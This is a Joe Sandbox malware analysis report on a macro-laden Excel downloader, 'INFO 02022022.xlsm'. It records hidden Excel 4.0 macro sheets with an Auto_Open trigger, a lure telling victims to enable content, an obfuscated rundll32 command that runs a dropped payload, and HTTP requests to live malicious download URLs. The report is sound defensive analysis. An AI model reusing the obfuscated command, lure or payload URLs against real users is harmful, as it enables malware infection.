Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INFO 02022022.xlsm

Overview

General Information

Sample Name:INFO 02022022.xlsm
Analysis ID:566383
MD5:09fc9d460b0b4894badbd711adf6e80d
SHA1:944d23b8a649430a40458071c4b3780d9a4f5801
SHA256:249f772d85dd7c9ab127a05ba592f5b2cc68ddd805b62c97864b87210558b729
Infos:

Detection

Hidden Macro 4.0
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sigma detected: Excel Network Connections
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • rundll32.exe (PID: 1484 cmdline: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    System Summary

    barindex
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, CommandLine: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2428, ProcessCommandLine: C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r, ProcessId: 1484
    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0": Data: DestinationIp: 190.92.141.240, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 2428, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 2428, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: INFO 02022022.xlsmVirustotal: Detection: 32%Perma Link
    Source: INFO 02022022.xlsmReversingLabs: Detection: 66%
    Source: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgiAvira URL Cloud: Label: malware
    Source: https://burialinsurancelab.com/q5kje9/K1mF/Avira URL Cloud: Label: malware
    Source: burialinsurancelab.comVirustotal: Detection: 11%Perma Link
    Source: https://burialinsurancelab.com/cgi-sys/suspendedpage.cgiVirustotal: Detection: 12%Perma Link
    Source: https://burialinsurancelab.com/q5kje9/K1mF/Virustotal: Detection: 15%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 190.92.141.240:443 -> 192.168.2.22:49165 version: TLS 1.2

    Software Vulnerabilities

    barindex
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.92.141.240:443
    Source: global trafficDNS query: name: burialinsurancelab.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 190.92.141.240:443
    Source: global trafficHTTP traffic detected: GET /q5kje9/K1mF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: burialinsurancelab.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: burialinsurancelab.comConnection: Keep-Alive
    Source: Joe Sandbox ViewASN Name: DesarrollosDigitalesdePulsarConsultingAR DesarrollosDigitalesdePulsarConsultingAR
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\126B0B6.jpgJump to behavior
    Source: unknownDNS traffic detected: queries for: burialinsurancelab.com
    Source: global trafficHTTP traffic detected: GET /q5kje9/K1mF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: burialinsurancelab.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: burialinsurancelab.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 190.92.141.240:443 -> 192.168.2.22:49165 version: TLS 1.2

    System Summary

    barindex
    Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing. please click "Enable Content
    Source: Screenshot number: 4Screenshot OCR: protected documents. 3 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled edi
    Source: Screenshot number: 4Screenshot OCR: Enable Content" button 6 7 8 9 10 11 12 13 14 15 16 RunDLL |~| 17 18 19 Therewasa pro
    Source: INFO 02022022.xlsmMacro extractor: Sheet: EFEWFWXV contains: URLDownloadToFileA
    Source: INFO 02022022.xlsmMacro extractor: Sheet: EFEWFWXV contains: URLDownloadToFileA
    Source: INFO 02022022.xlsmInitial sample: EXEC
    Source: INFO 02022022.xlsmInitial sample: EXEC
    Source: INFO 02022022.xlsmMacro extractor: Sheet name: EFEWFWXV
    Source: INFO 02022022.xlsmMacro extractor: Sheet name: EFEWFWXV
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="6" rupBuild="22527"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\2f\Cir\ZV\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{E9185827-836F-473E-8AEC-6E4E5044F488}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Gfefq1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="EbrbwQ1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EbrbwQ2" sheetId="5" state="hidden" r:id="rId4"/><sheet name="EFEWFWXV" sheetId="4" state="hidden" r:id="rId5"/></sheets><definedNames><definedName name="KKLD">EFEWFWXV!$C$15</definedName><definedName name="KKLD1">EFEWFWXV!$C$17</definedName><definedName name="KKLD2">EFEWFWXV!$C$19</definedName><definedName name="KKLD3">EFEWFWXV!$C$21</definedName><definedName name="KKLD4">EFEWFWXV!$C$23</definedName><definedName name="KKLD8">EFEWFWXV!$C$9</definedName><definedName name="_xlnm.Auto_Open">EFEWFWXV!$C$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: INFO 02022022.xlsmVirustotal: Detection: 32%
    Source: INFO 02022022.xlsmReversingLabs: Detection: 66%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"r
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\iix.ocx,D"&"l"&"lR"&"egister"&"Serve"&"rJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$INFO 02022022.xlsmJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmpJump to behavior
    Source: classification engineClassification label: mal96.expl.evad.winXLSM@3/4@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet4.xml.rels
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: INFO 02022022.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts21
    Scripting
    Path Interception1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    File and Directory Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts23
    Exploitation for Client Execution
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Disable or Modify Tools
    LSASS Memory2
    System Information Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
    Rundll32
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Process Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer2
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script21
    Scripting
    LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    INFO 02022022.xlsm32%VirustotalBrowse
    INFO 02022022.xlsm67%ReversingLabsDocument-Office.Downloader.EncDoc
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    burialinsurancelab.com12%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi13%VirustotalBrowse
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi100%Avira URL Cloudmalware
    https://burialinsurancelab.com/q5kje9/K1mF/15%VirustotalBrowse
    https://burialinsurancelab.com/q5kje9/K1mF/100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    burialinsurancelab.com
    190.92.141.240
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    https://burialinsurancelab.com/cgi-sys/suspendedpage.cgitrue
    • 13%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    https://burialinsurancelab.com/q5kje9/K1mF/true
    • 15%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    190.92.141.240
    burialinsurancelab.comArgentina
    10986DesarrollosDigitalesdePulsarConsultingARtrue
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:566383
    Start date:04.02.2022
    Start time:11:16:30
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 25s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:INFO 02022022.xlsm
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal96.expl.evad.winXLSM@3/4@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xlsm
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    190.92.141.240fichier 5266183.xlsmGet hashmaliciousBrowse
      fichier 5266183.xlsmGet hashmaliciousBrowse
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        DesarrollosDigitalesdePulsarConsultingARfichier 5266183.xlsmGet hashmaliciousBrowse
        • 190.92.141.240
        fichier 5266183.xlsmGet hashmaliciousBrowse
        • 190.92.141.240
        phantom.arm7Get hashmaliciousBrowse
        • 200.69.26.157
        URGENT_ORDER.exeGet hashmaliciousBrowse
        • 190.92.152.94
        sora.armGet hashmaliciousBrowse
        • 200.69.26.159
        FftiBztA3nGet hashmaliciousBrowse
        • 190.92.170.250
        TFiqcmldz5Get hashmaliciousBrowse
        • 200.69.26.199
        qYPsFsdb1KGet hashmaliciousBrowse
        • 200.69.26.179
        sora.armGet hashmaliciousBrowse
        • 190.92.204.168
        Jp0fvo75qaGet hashmaliciousBrowse
        • 190.92.204.178
        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        7dcce5b76c8b17472d024758970a406bNew Order.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        DHL.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        Specification Sheet .ppamGet hashmaliciousBrowse
        • 190.92.141.240
        copyTT.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        PO 85251532 65451562.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        Factura de proforma 3092222.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        RK-289902298.xlsbGet hashmaliciousBrowse
        • 190.92.141.240
        RK-1457693149.xlsbGet hashmaliciousBrowse
        • 190.92.141.240
        PO.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        Payment copy.ppaGet hashmaliciousBrowse
        • 190.92.141.240
        Payment Order.ppsxGet hashmaliciousBrowse
        • 190.92.141.240
        718921233926305733025810553.xlsGet hashmaliciousBrowse
        • 190.92.141.240
        Order 124020222.xlsxGet hashmaliciousBrowse
        • 190.92.141.240
        PO_000105.ppamGet hashmaliciousBrowse
        • 190.92.141.240
        6 (2).ppamGet hashmaliciousBrowse
        • 190.92.141.240
        Contract Agreement Signed.ppaGet hashmaliciousBrowse
        • 190.92.141.240
        fichier 5266183.xlsmGet hashmaliciousBrowse
        • 190.92.141.240
        Odeme.xlsGet hashmaliciousBrowse
        • 190.92.141.240
        1E40A77A.xlsbGet hashmaliciousBrowse
        • 190.92.141.240
        BF-1615471352.xlsbGet hashmaliciousBrowse
        • 190.92.141.240
        No context
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:HTML document, ASCII text
        Category:downloaded
        Size (bytes):605
        Entropy (8bit):5.084738390668529
        Encrypted:false
        SSDEEP:12:AgHFQww5sX//JZdTCw9UqbA6+6ZzufIPKdXsJ4AHbhBFpX9a/gqtPCtyHB2oQL:FlQv5sXJZRagdpKlsJVHVDpX9yOSB2D
        MD5:9716835EE556BAA1201D200BDAB6ED5A
        SHA1:50444B41FF47B9E83A8B2928B47EF9A7924540E4
        SHA-256:9D87C6086A4EF9B547CBE9BD6B57C0C259410E3BF15D9BC1CC676F9C2D0DB7B1
        SHA-512:D121E229C014491CB1FA48CB3A7EA713D84ED15693D84224C7DA8BBB3F6075BA23A7EC1AA37599E17300A4639F182C41CE5F4E5EBE5C081D0BEE1BF6C73536FE
        Malicious:false
        Reputation:moderate, very likely benign file
        IE Cache URL:https://burialinsurancelab.com/cgi-sys/suspendedpage.cgi
        Preview:<html>.<head>..<title></title>..<style type="text/css">.. ...body {....margin-top: 20px;....text-align: center;....font-family: Tahoma, Arial, Helvetica, sans-serif;....font-size: 14px;....color: #111111;...}...h1 {....font-size: 20px;....margin-bottom: 4px;...}...div.gbr {....margin: 20px auto 0px auto;....width: 450px;....border: 1px solid #C1E0BF;....padding: 6px;...}..-->..</style>.</head>..<body>..<h1>This page is currently unavailable</h1>.<div class="gbr">..If you are the webmaster for this site, please contact your hosting provider's support team for assistance..</div>...</body>.</html>.
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1360x191, frames 3
        Category:dropped
        Size (bytes):84867
        Entropy (8bit):7.954742205628136
        Encrypted:false
        SSDEEP:1536:jp20B+axURtKckrr9qZGrhD1GW+wZk4lHpuaI4qO:jHHxutKckrpqZGh+wrlJuaIjO
        MD5:FAD556093558C6609047F5662E77A074
        SHA1:8BE0B83C07D0B6C74A56114CC024C32CE877A8E6
        SHA-256:52B19EE1F2563496B0DA0CFDF7C3E12BD7C045B5E88AEAEFCDAC490C944BB59B
        SHA-512:08F003FD5CFCB0C173770C227E34E02DD1C126E58378679B6647D97C6B1841A8594D542CC043D3CC41E9A28E951F1533F05FD355A6E2EC7EC002662EC416CFDA
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................P............................................P............................!.1.."A.2Qaq#B.3R.....$%Cb&4Srsv..789c...DEVu....................................I......................!..1AQa...."q...2R..#Br...3b..$....45s..CScD................?..3.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q.....?.'z8.q..D\.8..D.O...."..
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):165
        Entropy (8bit):1.4377382811115937
        Encrypted:false
        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
        MD5:797869BB881CFBCDAC2064F92B26E46F
        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
        Malicious:true
        Reputation:high, very likely benign file
        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):605
        Entropy (8bit):5.084738390668529
        Encrypted:false
        SSDEEP:12:AgHFQww5sX//JZdTCw9UqbA6+6ZzufIPKdXsJ4AHbhBFpX9a/gqtPCtyHB2oQL:FlQv5sXJZRagdpKlsJVHVDpX9yOSB2D
        MD5:9716835EE556BAA1201D200BDAB6ED5A
        SHA1:50444B41FF47B9E83A8B2928B47EF9A7924540E4
        SHA-256:9D87C6086A4EF9B547CBE9BD6B57C0C259410E3BF15D9BC1CC676F9C2D0DB7B1
        SHA-512:D121E229C014491CB1FA48CB3A7EA713D84ED15693D84224C7DA8BBB3F6075BA23A7EC1AA37599E17300A4639F182C41CE5F4E5EBE5C081D0BEE1BF6C73536FE
        Malicious:false
        Reputation:moderate, very likely benign file
        Preview:<html>.<head>..<title></title>..<style type="text/css">.. ...body {....margin-top: 20px;....text-align: center;....font-family: Tahoma, Arial, Helvetica, sans-serif;....font-size: 14px;....color: #111111;...}...h1 {....font-size: 20px;....margin-bottom: 4px;...}...div.gbr {....margin: 20px auto 0px auto;....width: 450px;....border: 1px solid #C1E0BF;....padding: 6px;...}..-->..</style>.</head>..<body>..<h1>This page is currently unavailable</h1>.<div class="gbr">..If you are the webmaster for this site, please contact your hosting provider's support team for assistance..</div>...</body>.</html>.
        File type:Microsoft Excel 2007+
        Entropy (8bit):7.904718911000883
        TrID:
        • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
        • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
        • ZIP compressed archive (8000/1) 8.08%
        File name:INFO 02022022.xlsm
        File size:102421
        MD5:09fc9d460b0b4894badbd711adf6e80d
